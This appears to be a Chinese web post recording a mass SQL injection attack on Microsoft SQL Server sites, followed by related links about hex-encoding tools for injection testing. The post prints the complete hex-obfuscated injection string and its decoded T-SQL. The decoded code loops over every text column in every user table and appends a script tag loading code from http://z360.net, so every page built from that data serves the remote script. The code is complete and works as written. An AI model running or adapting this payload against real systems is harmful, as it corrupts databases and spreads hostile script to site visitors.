通过post,get,cookies方式注入,注入内容如下:
DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032
003500350029002C004000430020005600610072006300680061007200280032003500350029002000440065
0063006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072
0073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C
0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A0065006300740073
00200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200650020
0041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D
00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F00720
0200042002E00580074007900700065003D003300350020004F007200200042002E0058007400790070006500
3D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F007
00065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020
004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F0
07200200049006E0074006F002000400054002C004000430020005700680069006C0065002800400040004600
65007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078
00650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500
740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007
2007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0
027005D00290029002B00270027003C0073006300720069007000740020007300720063003D006800740074007
0003A002F002F007A003300360030002E006E00650074003E003C002F007300630072006900700074003E00270
02700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062
006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020004500
6E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044
00650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--;
在查询分析器里转换的sql语句如下:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
分享到:
相关推荐
SQL注入学习帮助小工具 16进制转换工具SQL注入学习帮助小工具 16进制转换工具SQL注入学习帮助小工具 16进制转换工具
一款很好用的SQL注入16进制转换工具,大家可以试用一下
16进制转换工具,非常 好。学习用的。SQL注入学习的时候转换URL等等呀
SQL注入_16进制转换工具学习用,勿用其它商业用途啊!
可对SQL注入时,进行代码变异注入。这个小工具可对SQL语句进行URL以及16进制的转换。 比如:select * from admin 将成为:0x530065006C0065006300740020002A002000460072006F006D002000610064006D0069006E00 用法: ...
之所以写这个,是因为发现SQL注入和XSS中经常利用十六进制表示的字符串,比如 SELECT CONCAT(0x68656c6c6f); 得到的是hello <!DOCTYPE html> <html> <head> <title>Hex-Char Bi-Converter&...
要防止SQL注入主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些特殊字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用16进制编码。
可对URL地址进行编解码,还有对SQL语句转换成16进制格式。嘿嘿~其实主要用来做注入测试呢。。
该工具将帮助您在测试SQL注入,XSS漏洞和站点安全性时对有效负载进行编码。 转换您选择的区域或转换所有字符。 支持 字符串<=> Base64,Base32,Base16 字符串<=>十六进制 字符串<=> EncodedURL 字符串...
16 SQL注入or绕过.php 17 密码md5比较绕过.php 18 md5()函数===使用数组绕过.php 19 ereg()函数strpos() 函数用数组返回NULL绕过.php 20 十六进制与数字比较.php 21 数字验证正则绕过.php 22 弱类型整数大小比较绕过...
·从许多不同的模拟常见攻击(比如SQL注入、跨站式脚本和操纵隐藏表单域)的方法中进行选择 ·作为自动化测试的出发点,通过使用秘诀中的脚本和例子,使你的测试可重复 不用再担心午夜来电话告诉你站点被破坏了...
实例104 防止SQL注入式攻击 377 实例105 对文件进行加密保护 378 实例106 对数据报进行加密保障通信安全 384 实例107 使用伪随机数加密技术加密用户登录密码 388 实例108 使用口令加密可执行文件 390 ...
实例104 防止SQL注入式攻击 377 实例105 对文件进行加密保护 378 实例106 对数据报进行加密保障通信安全 384 实例107 使用伪随机数加密技术加密用户登录密码 388 实例108 使用口令加密可执行文件 390 实例...
实例104 防止SQL注入式攻击 377 实例105 对文件进行加密保护 378 实例106 对数据报进行加密保障通信安全 384 实例107 使用伪随机数加密技术加密用户登录密码 388 实例108 使用口令加密可执行文件 390 实例...